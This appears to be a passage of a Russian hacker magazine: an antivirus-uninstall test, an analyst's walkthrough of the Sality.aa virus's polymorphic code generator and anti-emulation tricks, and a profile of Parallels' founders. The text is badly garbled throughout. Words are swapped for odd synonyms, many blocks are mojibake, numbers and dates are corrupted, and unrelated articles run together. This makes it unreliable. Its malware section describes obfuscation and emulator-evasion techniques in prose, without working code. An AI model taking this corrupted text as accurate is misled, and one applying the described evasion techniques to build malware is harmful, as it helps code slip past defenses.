Personal? Инсталлятор у сего антивируса равным образом домоделанный и никакими законными методами потаенный работа удаления наш брат найти не смогли. z 075 . Цель достигнута. тот или иной стартует возле запуске ОС равным образом служит для общения от пользователем. не дозволяется но что-то около прямо дать себя отослать с системы! Для анынсталла avast! Free Antivirus использует свой модуль. раскинул домашние щупальца по всей системе. в духе скрыто метнуть дело анинсталла? Поэтому моя особа предлагаю воткнуть Авире четверочку. картинку).exe "C:\Program Files\Alwil Software\Avast5\Setup\setiface. на нижеупомянутый в один из дней автор сих строк придумаем сызнова сильнее бесчеловечные способы и непременно тебя из ними познакомим.Âîò òàê âûãëÿäèò îáíîâëåííûé Àâàñò Ïðîöåäóðà óäàëåíèÿ avast! Antivirus Free íà ïåðâûé âçãëÿä ÒÅÑÒ ¹5 Пятой склифосовский испытание полного удаления защитного ПО из через штатного инсталлятора. показали себя хватает хорошо.8 балла. значит. dll" RunSetup. Жмем кнопочку Del сверху клавиатуре да на возражение получаем безрадостное Access denied. Установка равно уборка NOD’а выполняется из через стандартного майкрософтовского инсталлятора. Но даже если бы нам посчастливилось прикрыть остановка удаления программы. Также им XÀÊÅÐ 00 /141/ 00 постоянно запущена служба. ничего.

обкатывание равным образом схема BackDoor’а.AA Ó÷èìñÿ ðàñïîçíàâàòü ïîëèìîðôèçì è îáôóñêàöèþ êîäà íà ïðèìåðå èçâåñòíîãî âèðóñà Наш настоящий испытание хорош посвящен полиморфному генератору инструкций. Но да сие до сей времени никак не все. так на них было мало качественных изменений равным образом они отнюдь не получили широкого распространения.Sality.aa. распространение из через съемных носителей. ÎÒÐÀÆÀÞÙÀß ÀËÃÎÐÈÒÌ ÐÀÁÎÒÛ ÏÎËÈÌÎÐÔÍÎÃÎ ÃÅÍÅÐÀÒÎÐÀ ÑÕÅÌÀ ÇÀÐÀÆÅÍÈß PE – ÔÀÉËÀ ÂÈÐÓÑÎÌ Virus. А чисто экземпляр Virus. XÀÊÅÐ 00 /141/ 00 . шифр его что есть мочи равным образом качественно обфусцирован. SIB.aa -ÏÐÅÏÀÐÀÖÈß: ÂÑÊÐÛÂÀÅÌ ÕÈÒÐÛÉ SALITY.Sality. полина ModRM. В изм пяти полет было выпущено вагон версий. Именно таковой зловред является отличным примером интересах разбора. опкоды. сгенерированного обычным компилятором.Win32.Win32. а одна из последних. видоизменение «aa» – во июле 2008 года.Win32. старший вирусный аналист « Лаборатории Касперского» Òî÷êà âõîäà ïñåâäîêîä Òî÷êà âõîäà Ñåêöèÿ êîäà êîìïèëÿöèÿ ìàøèííûé êîä îáôóñêàöèÿ îáôóñöèðîâàííûé ìàøèííûé êîä ñ äîáàâëåíèåì FakeAPI Header äîáàâëåíèå îáôóñöèðîâàííûé àíòèýìóëÿöèè ìàøèííûé êîä Ïðîöåññ çàðàæåíèÿ Äðóãèå ñåêöèè Header Ñòàðòîâûé êîä âèðóñà Ñåêöèÿ êîäà Äðóãèå ñåêöèè Îðèãèíàëüíûé ôàéë Íîâàÿ ñåêöèÿ ñ îñíîâíûì òåëîì âèðóñà Çàðàæåííûé ôàéë ÑÕÅÌÀ. для эту статью у нас взрослые планы.Win32. Также не останутся без участия внимания общие схемы работы обфускатора равно из первых рук генератора кода. Он позволяет прикладывать многообразный обфусцированный адрес со применением FakeAPI присутствие каждом его использовании. в области которым можно отличить обфусцированный да потенциально зловредный шифр ото стандартного.MALWARE Закоржевский Вячеслав. применяемому на известном вирусе Virus. а да снабжен антиэмуляцией в основе вызова API-функций. равно опишем признаки. Если честно. как-никак во ней автор рассмотрим тонкости формирования x86-инструкций – префиксы.Sality – «a» – появилась единаче на 0003 году. Основной его функционал – инфекция PE-файлов. С момента своего выпуска симпатия занял лидирующие позиции в рейтингах вирусной активности да остается в них вплоть по настоящего времени.Sality. Он на полной мере полиморфен. 076 Для азы рассмотрим самоуправно вирус.aa получился бери редкость «удачным» – возлюбленный отличный распространяется и обходит антивирусы. Самая первая видоизменение Virus.

что такое? в REG находится настоятельный Sality адресочек назначения): JMP REG.Полиморфизм пятерка проявляется около заражении файлов – каждый раз генерируется окончательно разнородный код. На самом начальном этапе генератор получает получи и распишись сени беспричинно называемый псевдокод. POP REG. IMM. каковой содержит логику исполняемого фрагмента. Вот его логика: • Сохранить оригинальные значения регистров равным образом флагов. сгенерированный «на лету». Генератор на обеих случаях используется одинаковый. Они располагаются объединение точке входа равно в начале новой секции. а утилизация FakeApi позволяет легко и просто отшагать некоторые эмуляторы. [ESP]. но. равно бросьте больно сложным для разбора. На скриншотах приведен абсолютный площадь стартового стих вируса. Красными овалами выделены инструкции. А предписание команды CALL. опять-таки. сколько адрес. реализуются во Sality множеством способов. так его функциональность сохранится. а квалифицированная с них являются таково называемыми PoC (Proof of Concept) да отнюдь не получили королем распространения. некто обладает идентичной функциональностью.Sality. во целом. Отличным примером такого склада модели является EPO (Entry Point Obscuring) – вирус Virus. Второй обладает богатой функциональностью. со значительными трудностями. Псевдокод стартового участка вируса вдоволь прост. • Вычислить VA перехода.èëè äâóõ. Так каким но образом работает генератор? В общем случае алгорифм выглядит следующим образом: Îí â ïîëíîé ìåðå ïîëèìîðôåí. кладет на стека возможный местожительство (VA) следующей инструкции. кабы инсталлятор от данными во оверлее подвергнется заражению. существуют равно иные вирусы не без; аналогичной «начинкой». Однако минус применения обфускации предначертание полученного стих до чертиков реально быть просмотре дизассемблерного листинга. чтобы на ней не запрещается было читать. который нет слов времена исполнения расшифровывает равно исполняет «полезную нагрузку» вируса. аюшки? неграмотный скажешь об «обработанном» коде. Sality заменяет характеристический шифр приложения. расположенный по точке входа. Как различимо изо дизассемблерных листингов. 077 . притом свежеиспеченный механический шифр стало с головы единовременно разными способами. CALL REG. долго на 0x300–0x400 байт кода. представленных получай иллюстрациях.Win32. при всем при том из использованием генератора случайных чисел. IMM. • Получить VA текущего.Sality. полученное получи втором этапе. Конечно. около этом во файле присутствует статичная край кода. Также на отправной файл добавляется дополнительная сегмент не без; полиморфным декриптором. Оверлей исходного файла «отодвигается» во конец. а нате выходе – готовую инструкцию: ãåíåðàöèÿ îïêîäà èç ñïèñêà (îäíî. à òàêæå ñíàáæåí àíòèýìóëÿöèåé íà îñíîâå âûçîâà API–ôóíêöèé Схема. позволено было вызвать инструкцию POPAD. что такое? можно исполнить из через четырех–шести инструкций. что-нибудь на Sality формируется двум области. В его задачу входит развитие заключение не без; заданными свойствами. Обфускация реализована утилитарно безупречно – то. равно дабы перед тем. Вызов PUSHAD нужен. значительная инструкций безграмотный несут полезной нагрузки. а добавлены всего лишь пользу кого того. Таким образом. • Выполнить перерастание по мнению вычисленному VA. Расположение самой точки входа остается неизменным.aa во зараженном файле Теперь перейдем ко обзору обфускации. всегда по-разному. Способов расчеты весть много. IMM. содержащие сгенерированный код. которая зашифрована. Далее происходит компиляция. чтобы сэкономить исходное собственность процессора. сверх выполнения перехода. Псевдокод представляет собой совокупность команд.Zombie. После сего механический код подвергается обфускации. Статический исследование дизассемблерного листинга сопряжен. В этом да заключается полиморфизм. нате особый собственный. RETN. Теперь по части самой технике заражения. как бы подать орган оригинальной программе. задающие достижимый поверхность получаемой команды. Третий равным образом четвертый этапы. Вся действие генератора XÀÊÅÐ 00 /141/ 00 будет пояснена для первом участке. определенного размера и выполняющего назначенный псевдокод. Каждый ступень по-своему интересен равно короче рассмотрен кончено поподробнее лично сейчас.Win32. выводить равно исполнять.aa Перейдем из рук в руки ко генератору. отражающих определенную функциональность и понятных интересах человека. начиная вместе с точки входа зараженного файла: Стартовый адрес Virus. во лента ото первого. Для прикидки адреса перехода используется значение. В приведенных меньше примерах да засим объединение тексту подина REG подразумевается какой приглянется 02-битный перечень общего назначения. в соответствии с понятным причинам. можно получить будет большое доля исполнений такого простого алгоритма. располагается сверху вершине стека): POP REG. Совмещая до сей времени возможные варианты каждой с операций. Весь эксплуатация показан возьми схеме. SUB REG. восстанавливающую оригинальные значения регистров. получи схеме текущий выдержка называется «стартовый код вируса». MOV REG. Выше было написано.Win32. В данном файле вычисление адреса с целью перехода реализуется хоть взяв семь раз командами. получая в входе определенные параметры. И начатое ремесло завершается добавлением одной или нескольких фэйковых API-функций во код. Итак. соответствующие по всем статьям этапам псевдокода. добавленной вирусом. полученный на втором этапе. благодаря что-что подле беглом просмотре адрес получается практически идентичным.áàéòîâûé îïêîä). Подробнее относительно нем полноте написано ниже. чтобы усложнить анализ. Самый свежий этап (четвертый) вот и все может бытовать выполнен разно (считаем. В последних используются соответственно инструкции PUSHAD равно CALL. ADD REG. Приведем иные с них (будем считать. Атрибуты последней секции задаются таким образом. ADD [ESP]. êîä åãî ñèëüíî è êà÷åñòâåííî îáôóñöèðîâàí. на разница ото первого да второго. Сам обфускатор работает во порядочно этапов. PUSH REG. отражающая алгорифм работы полиморфного генератора Поясним приведенную схему. а почти IMM – числовое авторитет произвольный размерности. Схема заражения PE-файла вирусом Virus.

Например. Они используются интересах придания инструкции определенных свойств. Если в инструкции закраина Mod безграмотный равняется 0. равно во в таком случае а пора фон R/M так же 0. 0xFFEEFFEE. Каждый опкод обладает определенными свойствами. используемого инструкцией – видеопамять alias регистр. которые самочки по мнению себя образуют инструкцию. â íàäåæäå íà òî. Генератор работает неграмотный полностью случайно. образующим инструкцию является префикс. Возможно куча реализаций: PUSH 0. Если коренной байт Ëèêáåç: ïîëèìîðôèçì è îáôóñêàöèÿ Полиморфизм – реальность объектов не без; одинаковой спецификацией иметь различную реализацию. же полностью могут взяться использованы. показанных бери схеме: Mod. 06 – Operand – Size. во которых следующий байт слабит однозначный ум равным образом называется ModRM. PUSH EBP – 05h. использует следующие цифра байта. POP EBX. Допустим. XÀÊÅÐ 00 /141/ 00 . XOR EAX. например. невыгодный с целью всех опкодов существует байт ModRM да числовой операнд. AND EAX. F2 – REPNE. Íèæå ìû ðàçáåðåì åãî â ïîäðîáíîñòÿõ ãåíåðàöèÿ áàéòà ModRM. POP ECX. 07 – Address Size. А для некоторых опкодов. 06 – SS — // — // -. 06 – ES — // — // -. 0x81. Всего их одиннадцать: ECX. беспричинно да двух. 0. Он может быть как бы однобайтовый. с намерением «замусорить» полезный код. Все три последовательности инструкций никак не несут неважнецкий полезной нагрузки. выполняемую инструкцией. сохраняющему ее функциональность. малограмотный устанавливает пашня Mod равным 0 интересах инструкции LEA. 04 – FS — // — // -. Каждый приставка занимает одиночный байт. каждая наставление обязана содержать во себя опкод. А вкушать такие опкоды. которые дьявол может использовать и. 05 – GS — // — // -. Так. 0xC1. Конкретный пример: PUSHAD. äîáàâëåíèå ïðåôèêñà ê ïîëó÷åííîé èíñòðóêöèè. а как – «IA-32 Intel® Architecture Software Developer’s Manual». В этом равным образом заключается полиморфизм – содеять одно равно ведь же. EAX. INC EAX. MOV EAX. F3 – REP. Если его важность равно 3. только затрудняющему анализ. Он вот и все показан нате схеме. однако сие неграмотный хорэ затронуто на статье. 0FFFFFFFFh. ÔÎÐÌÀÒ ÈÍÑÒÐÓÊÖÈÈ ÀÐÕÈÒÅÊÒÓÐÛ X86 Итак. NOP. так спирт является двухбайтовым. Например: ADD EAX. например. Еще одним необязательным элементом. Он используется с целью формирования инструкций. в таком случае сие регистр. Этапы 0 – 0 опираются получай плод первого. нам нужно сложить код. 0E – DS — // — // -. добавляя их к инструкции. например. Reg/ Opcode. соответственно. ÷òî ýìóëÿòîð íå ïîääåðæèâàåò ðàáîòó ñ òàáëèöåé èìïîðòîâ èëè íå ìîæåò ðåàëèçîâàòü êîððåêòíîå èñïîëíåíèå Этот байт состоит изо трех полей. PUSH EBX.и трехбайтовый. 0B8h – MOV eAX. Для того. 078 F0 – Lock. 0x80. Гружено? Согласен! Приведем простой пример. [EAX].MALWARE Ñóðîâàÿ êðàñîòà èñõîäíîãî êîäà. EDX. 0xFFEEFFEF. NOP. а другие возможные – память. R/M. PUSHAD – 00h. который вывод байт B8 FF FF FF FF эквивалентна инструкции MOV EAX. У него лакомиться достоверный наличность опкодов. Таким образом получается. EAX. ADD EAX. SUB EAX. Обфускация – сокращение исходного текста или исполняемого стих программы для виду. С через Mod’а определяется субчик операнда. OR EAX. NOP. Основное функция R/M да Reg/Opcode – указывать бери операнды инструкции. MOV EDX. край Reg/Opcode указывает в саму операцию. LEA EAX. обратимся для первоисточнику – документации Intel. [EAX + ECX*4 + 000]. 0. осмысление алгоритмов работы и модификацию подле декомпиляции. Для трехбайтовых возможно ряд вариантов. делянка 0А. lz. FakeAPI — âûçîâ ïðîèçâîëüíûõ API–ôóíêöèé. дай тебе втолковать миссия всех упомянутых полей равно само устройство элементарной инструкции процессора x86. 0E – CS segment override. POP EAX. только разными способами. Генератор. то появляется до сей времени одиночный байт – SIB. Не ко каждой инструкции не запрещается несложно приплюсовать префикс. PUSH опкода равен 0Fh. Но у команды может оказываться за единый вздох небольшую толику префиксов. POPAD. NOP. Существуют опкоды. работающих не без; составными операндами памяти. возможные варианты байта ModRM. какой-никакой заполняет регистр EAX значением «0». äîáàâëåíèå ïðîèçâîëüíîãî ÷èñëîâîãî îïåðàíäà.

LODSW. а на приведенном раньше примере кода сии байты находятся накануне командами CALL. Генератор. Use of repeat prefixes and/or undefined opcodes with other IA32 instructions is reserved. BTC. z 079 . К ним относятся постоянно PUSH’ы да POP’ы. А байты REPNE/REP добавляются только лишь ко инструкциям. В представленном случае архи несомненно отличить фэйковые запуски от реальных вызовов. рядом должном опыте. равным образом в таком случае около определенных условиях. исход их работы – регистр EAX иначе его составные части. используется избыток двухбайтовых опкодов. XADD равно др. Как оказалось. Аналогичная наворот да из сегментными префиксами. Еще одна особенность полученного заключение – целиком и полностью произвольные числовые операнды. INS. намного усложняют неподвижный расследование да фактически полностью «размывают» полезную нагрузку вируса. and OUTS). воеже избежать взаимодействия с памятью. что воочью безграмотный может держать район на нормальном файле. Компилятор рядом генерации заключение сроду далеко не короче конкатенировать префиксы для тем командам. LODS. вот всех генерируемых инструкциях фон Mod непропорционально 0. во этой статье я рассмотрели совершенно этапы работы полиморфного генератора. а значит. работающими от памятью. F3H) cause an instruction to be repeated for each element of a string. стоит отметить равно оный факт. А во документации Intel написано следующее: «Repeat prefixes (F2H. до нитки образующие инструкцию. Use these prefixes only with string instructions (MOVS. ÇÀÊËÞ×ÅÍÈÅ Итак. что перед тобой находится зловред. В представленном дизассемблерном листинге на таком качестве используются двум функции – FindCl ose равно GetModuleHandleA. при добавлении FakeAPI во заключительный код. Такое. зачем утилизация всех сих «примочек» несравнимо упрощает дефиниция вредоносного кода. только рядом этом значительно усложняет расследование кода. CMPS.Sality. Этот прием используется в целях обхода простых эмуляторов или виртуальных машин. ко примеру – SCASB. во ведь но время. Во–вторых. безусловно. во надежде сверху то. STOS. MOVSD. Во-первых. спирт использует однобайтовые опкоды. функции FindClose вынужден подаваться корректный хэндл. которые что ни говори малограмотный оперируют от памятью: SHLD. Все сегментные префиксы используются солидарно из инструкциями. их не грех автоматизированный подложить ко произвольной команде. И напоследки – Sality добавляет байт 06h. пользуется определенным списком. íî óæå â äðóãîì ôàéëå Согласно документации Intel отдельный платеж может применяться исключительно во определенных целях. such use may cause unpredictable behavior». А в эту пору позволено подвергнуть обсуждению равно те моменты. В-третьих. BTS. BSF. исчерпание префиксов F2 равным образом F3 к тому идет только с ограниченным списком инструкций. а также сегментные равным образом REPxx префиксы ко произвольным инструкциям. Добавление FakeAPI также добавляет исследователю высший боли. Это весьма странно. А во приведенном файле происходит проведение FindClose (0) по прямой вместе с точки входа. ась? эмулятор безвыгодный поддерживает работу с таблицей импортов или — или отнюдь не может воплотить в жизнь корректное исполнение. хотя. а резать исключительно со другими регистрами другими словами мгновенными значениями.Win32. стоит всего лишь одного взгляда.Ñòàðòîâûé êîä Virus. Так ась? но использует агрегат Sality? Во-первых. Но. для обращения для определенному сегменту. ась? конец удивления достойно на нормальной программы. на которой Mod век равен 0. Исключение составляет общество LEA. от времени до времени бывает. SCAS. Так. и недостаток локальных да глобальных переменных. Генератор на Sality добавляет их для всё произвольным инструкциям. какой-никакой неграмотный взаимодействует из памятью. А на Sality байт 04h может не принимая во внимание проблем антиципировать инструкXÀÊÅÐ 00 /141/ 00 Ôîðìàò èíñòðóêöèè àðõèòåêòóðû x86 цию CALL. а инда во ней несть такого обилия случайных чисел. а употребление 0 приведет ко генерации исключения. когда-никогда реализуется какая–то отправления с криптоалгоритма. которые позволяют отличить сгенерированный шифр через кода. что-то около в духе транслятор может истощить лишь только регистры в коротких функциях. Префиксы размеров операнда равно адреса изменяют уместно их размеры на наименьший тож больший. позже без труда стираются да не используются. конечно. для на деле полное за глаза работы от памятью. Таким образом. Начнем не без; префиксов. на Sality беда плодотворно используется полиморфизм равным образом обфускация. во котором перечислены API-функции. чтоб определить. Их использование малограмотный сообразно назначению может быть беременным неопределенный характер. полученного компилятором. на зависимости ото режима работы. Во-вторых. для которым сие запрещено делать! На что такое? до этого времени пристало преобразить забота подле просмотре кода? Например. TEST и прочими. А заключается некто на вызове произвольной API-функции. С через всех сих методов следственно первосортный обфусцированный код. которые отнюдь не несут полезной нагрузки. В нем присутствует большое цифра инструкций. работающим со строками или с массивом байт. намоленный прежде от через FindFirstFile.aa â çàðàæåííîì ôàéëå Åùå íåìíîãî âèðóñà. SHL. Переходим ко самому последнему этапу генерации заключение – добавление FakeAPI. которые получают на доступ только лишь безраздельно параметр равно никак не вносят никаких значительных изменений во систему.

îäíàêî äîñòèæåíèÿ ýòîé êîìïàíèè ñëîæíî íåäîîöåíèòü. Забавно. Сергей Белоусов (председатель совета директоров равным образом старательный глава Parallels) Уроженец города Ленинграда Гуля Белоусов — единица очень «нелинейной» судьбы. симпатия как по писаному развивалась. высокочтимый — безграмотный стоит на повестке дня высокоталантливый и удачливый самоучка.СЦЕНА Мария «Mifrill» Нефедова местом интересах ведения дел оказался Сингапур. во вкусе твоя милость понимаешь.). кстати. в основном сконцентрированы на странах Восточной Азии (Тайвань.д. равно приключилось это. работе да развитии 00 от лишним проектов. ñêîðåå âñåãî. однако на далеком 0992 году именно здесь зародилось бульон заваривание Сергея. Ëàáîðàòîðèÿ Êàñïåðñêîãî è Parallels. а граджанство Сингапура получил всего только потому. Его биография невыгодный похожа для стандартное «родился. Его фирма занималась сборкой равно производством компов изо импортной комплектухи. почти аналогичное предприятие. ни во оный раз. òû íå÷àñòî ñëûøèøü èìÿ Parallels. которе ныне назвали бы стартапом. равным образом начнем наше повествование. страна восходящего солнца равным образом т. Компания Standard & Western была основана совместно со Ильей Зубаревым. «ïîùóïàòü» êîòîðóþ ïîêà ñìîãëè ëèøü èçáðàííûå: ABBYY. работал». Забегая на первых порах скажем. Дело во том. что проколесить от российским паспортом было неудобно: приходилось брать много виз. зато ради 00 последних планирование возлюбленный успел провести отношение на основании.ru ÏÀÐÀËËÅËÈ IT-ÁÈÇÍÅÑÀ ÈÑÒÎÐÈß ÊÎÌÏÀÍÈÈ Parallels Íà ñåãîäíÿøíèé äåíü ëèøü ñ÷èòàííûì åäèíèöàì ðîññèéñêèõ ITêîìïàíèé óäàëîñü äîáèòüñÿ ñåðüåçíûõ óñïåõîâ çà ðóáåæîì. зачем там. который некто «там живет». Взаимодействовать не без; ними оказалось удобнее не с России . во всякое время сорная зелень не пропадет поприще равно софту. Но стать для достигнутом Сергуша Белоусов опять отнюдь не пожелал. пожалуй. тоже выпускником институт Белоусова — МФТИ. òî. Именно МФТИ равным образом стал пусковой точкой для 080 074 Белоусова. высокий покинул молодую фирму равным образом за единый вздох но окунулся на другое. XÀÊÅÐ 00 /141/ 00 . Нет. Åñëè òåáÿ íå èíòåðåñóþò âèðòóàëüíûå ìàøèíû äëÿ «Ìàêîâ». хоть бы и нельзя сказать. ËÞÄÈ История Parallels конец запутанная да не самая тривиальная. хотя равно это начинание Белоусова во будущем ждал немалый успех — засим «железное» подразбиение S&W переродится во неплохо известный на текущий табель бренд за производству электроники Rolsen. Несложно догадаться. ПО наконец-то привлекло почтение Белоусова в середине 00-х годов. погодя только двушничек лета по прошествии основа- ния своего первого стартапа. не без; одной едва поправкой — вместо компов S&W производила телевизоры и компьютерные мониторы. Гонконг. диплом с отличием магистра физики равно электротехники да стадия кандидата технических наук по специальности «Информатика» Московского физико-технического института (МФТИ). что в сущности Сергиян живет на дороге да отелях. Новая шарашка в свой черед занималась сборкой и производством. С рассказа о некоторых с них мы. случайно. Дело на том. початие получило прозвище Standard & Western. скажем. женился. объединение его собственному признанию. учился. à òàêæå ÏÎ äëÿ àâòîìàòèçàöèè . по части образования у него ненарушимый порядок: он имеет документ бакалавра физики. равно перебрался Белоусов. ни на последующие годы. однако Белоусову через малое время захотелось большего. Но вернемся ко делам давнёшенько минувших дней и сборке компьютеров — картина у юный компании шли неплохо. Возникшее благадаря связям полученным сверху сборке компьютеров. сумевший застать волну. в чем дело? компанию создали равно по части нынешний сутки продолжают возглавлять очень интересные да яркие люди. Ïîñòàâëÿòü ñâîè ïðîäóêòû íà çàïàäíûé ðûíîê è óñïåøíî ðàáîòàòü ñ äðóãèìè ñòðàíàìè — çàîáëà÷íàÿ ìå÷òà.что держи сегодня он является гражданином Сингапура. В 0994. идеже имеется «железо». ради всеобщего удобства. Все основные поставщики последней.xakep. Именно туда.

Parallels обслуживает с гаком 00 млн. конечных пользователей на 025 странах мира. сообразно мнению многих экспертов. а можно от них ожидать. не грех было просчитать высота их знаний. сообразно всему миру. Николай Добровольский (вице-президент по развитию продуктов) Одновременно из историей Сергея Белоусова развивалась сказание до этих пор одного человека. По каким-то своим каналам. хотя кто такой бы был в силах подумать. через бывших выпускников МФТИ. аюшки? будущему Rolsen Electronics потребовалось насадить бухгалтерскую систему. во вкусе Мастерхост. У Parallels больше 000 партнеров. продвижением равно поддержкой в Юго-Восточной Азии ERP-систем Solomon. изо наших из тобой соотечественников — после были равным образом выпускники того но МФТИ. является тулзой ради Mac №1 от сторонних разработчиков. Так. Следующий период на жизни компании можно назвать этапным порядком продвинутого аутсорсинга. Команда S&W возьми оный мгновение состояла. После долгих переговоров. AMD. Ей пользуются с лишним 0. наравне Microsoft. об уровне образования соискателей. Dell. ориентированных получи участок среднего равно малого бизнеса. зачем нанимать других людей легко далеко не получалось — нанимая русских. нужно было разрабатывать разработкой софта для компании Pervasive. Старый Свет — пуще 00%. Получить копию их дорогостоящего ПО. Доступа во Интернет тогда не было. приближенно что-то договоренность была достигнута быстро. когда могли снять местных после копейки?». HP равно IBM. а Лермонтова в эту пору приносит не так 0%. Продукты компании поддерживают паче 0 млн. По словам Сергея Белоусова Parallels Северная Штаты обеспечивает немножечко слабее 00% выручки. что они адски хотели поручить кому-нибудь с своих партнеров. напротив. Дело во том. например. что их вещь стоил конкретно дешевле. был и единаче одиночный нюанс. Дело во том. S&W обалденно справлялись с локализацией.5 млн. На российском рынке клиентами Parallels являются такие крупные компании.PARALLELS DESKTOP — ÂÈÐÒÓÀËÜÍÀß ÌÀØÈÍÀ ÄËß «ÌÀÊλ Все началась со того. проживавших в Америке равно работавших на банках. РБК. Будущий лауреат премии имени Зворыкина. от «Соломон» были наведены партнерско-дистрибьютерские мосты. поставщика систем управления базами данных Solomon. и другие российские инженеры. Standard & Western заинтересовался разработкой софта равно порядочно бурно сориентировался на тонкостях разработки ПО. чем труд их западных коллег. который также сыграл на Parallels одну с главных ролей. С другими но национальностями существовали культурные пробелы — мало того. Intel. окончившие не ÍÅÌÍÎÃÎ ÑÒÀÒÈÑÒÈÊÈ: Компания Parallels имеет паче 00 наград равно сильнее 05 патентов. только равным образом легко никак не представляла. Софтлайн равным образом Русоникс. фактически выполняя огульно кругооборот инженерных разработок ПО Solomon. экой ВУЗ закончил человек. По некоторым данным через 00% поперед 08% выручки Parallels получает ради рубежом. XÀÊÅÐ 00 /141/ 00 менее хорошие российские вузы. 081 . серверов да настольных ПК. Осуществлять работу изо России равным образом малограмотный получалось. Впрочем. добро бы бы исходя изо того. что-нибудь главенство Белоусова никак не могла судить. Итак. Parallels Desktop для того Mac. с сего списка осталась ÑÅÐÃÅÉ ÁÅËÎÓÑΠИменно если на то пошло 00 российских инженеров S&W стали заниматься с Сингапура. Так что-то неграмотный стоит удивляться равно спрашивать: «Зачем сие они везли работников изо России на Сингапур. который одними только бухгалтерскими системами равным образом скидками профессия не ограничится. Apple. в целях банальной экономии. удалось составить наличность изо 06 ERP-продуктов. можно было как только пройдя сертификацию нате осведомленность их продукта равно став реселлером компании. обернулось быстрорастущим бизнесом. находились нате том же уровне. не ведь — не то были слабо выше. заключенное вместе с Solomon Software случайно. А через малое время у «Соломона» нашелся еще единовластно проект. в основном. а также в нюансах его дистрибуции сверху рынках других стран. зато ярус знаний и квалификация. лишь одна общество — Solomon Software. Партнерство. промеж которых такие монстры. Владельцы Solomon беспокоились по поводу сохранности исходных кодов равно их возможного использования во плохо защищенной патентным правом стране. Standard & Western в оный одну секунду были заинтересованы в такого рода работе ни на грош далеко не менее потенциального заказчика.

зачем разработчики обитают в основном во Москве. примерно вплоть вплоть до 0000 года. что-то в МИРЭА. во которой получи первых порах трудилось всего рядом красненькая смертный (в основном ребята. равно интересах того времени во частности. кстати посетивших гения. Добровольский начал поуже сверху третьем курсе. Имя сменили с практических соображений: во-первых. приказ прост равно невыгодный включает никаких «особенных ингредиентов» — как только тяжелая работа. Это решительно решило деяние — одно изо двух был сделан далеко не в пользу «Бауманки». грянул кризис. сколько Колюня подал бумаги единаче да на Московский научно-исследовательский институт радиотехники. затем поступил на школу присутствие МГТУ им. превыше наша сестра прервали историю Standard & Western нате том. и остался. Так равным образом родилась мысль. прогеров. Хотя фактического опыта у Добровольского безграмотный было. прошедшее название было признанно чересчур длинным равно сложным. И их немало. а равным образом сноровка отыскивать всеобъемлющий язык с самыми разными людьми равным образом никогда. по образу вариант почти того самого. в чем дело? главенство на конце 00-х занялась продвинутым аутсорсингом. Добровольский отнюдь не прогадал равно попал во свою стихию. равно однозначный фундамент. малограмотный было никаких красивых «гениальных идей». Не последнюю место на нелегком выборе между двумя вузами сыграл да оный факт. готовивший айтишников. присутствие поддержке компании Siemens. Какое-то время. в 1975 году. который на Ленинских горах — был нимало рядом. а во Новосибирске сконцентрированны службы поддержки. что такое? неграмотный чрезмерно свойственно пользу кого нашей страны вообще. Как показало время. а устоявшие XÀÊÅÐ 00 /141/ 00 . Итак. малограмотный имеющих поддержки IBM. сейчас на возрасте 04 парение некто выиграл всероссийский соревнование сообразно программированию. рой затраченной энергии. ÊÎÌÏÀÍÈß ÑÅÐÃÅÉ ÁÅËÎÓÑÎÂ Ñ ÏÐÅÌÈÅÉ CNEWS AWARD Николай Добровольский. равно со редкими на ту пору компьютерами судьба свела его всё случайно. На современный дата важный канцелярия компании Parallels расположился. Дело во том. У него появились да полезные знакомства. уже после того. сих разработчиков. С темой виртуальных машин возьми десктопах. ведь снедать програм- 082 мистом. потом переезда нате новое место жительства. во-вторых. Увы. менеджеров равно приблизительно спустя некоторое время — штат компании насчитывает еще 000 смертный в области всей планете. куда равным образом счастливо прошел равно где. во Швейцарии. В начале 00-х годов. Известно также. во таковой но эпоха Standard & Western Software успел переименоваться во SWsoft. аюшки? было бы вкрутую лукнуть сколько-нибудь ОС виртуально. Так появилась возьми вселенная фирма Parallels. Так уж вышло. Добровольский (тогда — ученик 4-го класса) решил записаться во какой-нибудь кружок. Эта идея настоль захватила Добровольского. первого заказчика был сделан. сие работало — среди партнеров компании числился еще не только Solomon Software. Первые халтуры Николаю подбросил его ученый руководитель. Кстати. хотя да единый колонна других фирм. во итоге. получай толки Standard & Western можно легко зачислить вслед Standard investment. где-то да финансовых. Начав вместе с программирования калькуляторов во кружке Дворца пионеров. Колюня загорелся мыслью сложить отдельный. настоящий продукт. Дело таким образом ради малым: осталось потухнуть корпеть в кого-то да начать работать нате себя. в процессе работы по-над проектом в целях иностранного заказчика. долгоденствие на разъездах. Экономический пузырь доткомов лопнул. Просто на 0000 году. равным образом приключился печально знаменитый «dot-com bubble». некто ахнуть отнюдь не успеешь учился и схватывал держи лету. в чем дело? целиком устроило его первых работодателей. Баумана. что для Николая было далеко не не так важно. электроники равным образом автоматики (МИРЭА). тогда был создан факультет. Как но из-за незавершенный десяток планирование Белоусову посчастливилось утвердить компанию через средних размеров стартапа для миллионным прибылям равным образом званию одного с крупнейших игроков рынка? Судя по всему. А затем держи Западе. по образу огон внутри ясного неба. да прочих изящных поворотов судьбы. хотя сие требовало больших затрат. Работать по мнению специальности. как временных. ряд старых систем. куча IT-компаний идемте ко дну купно не без; ним. внутри одного физического компьютера. ко моменту окончания университета Микола приобрел большой опыт. По сути. Таким образом. из которыми Добровольский перезнакомился по работе). которая да достанет с годами его коньком. Николай впервой столкнулся собственно до работе. понадобилось швырнуть на новых компах. никогда не сдаваться.СЦЕНА ÂÛÑÒÓÏËÅÍÈÅ ÁÅËÎÓÑÎÂÀ ÍÀ PARALLELS SUMMIT 0009 что симпатия принялся оттачивать ее равно далее. Но сверх айтишных премудростей в МИРЭА давали равным образом бизнес-дисциплины. Вскоре подшлифовка превратилась во постоянную работу. хорошо Дворец пионеров — тот. а офисы продаж равным образом вовсе раскиданы за по всем статьям частям света (более нежели в 15 странах мира). что-нибудь свободные места позднее оставались только на кружке информатики. да становая жила — желание достигнуть большего. куда ни на есть Миколай и подался. родился на Москве. а по прошествии получи и распишись автомате был зачислен равно на саму «Бауманку». физически разместившись на Сингапуре. Однако от МГТУ у Добровольского не сложилось. ни бездна ни мало.

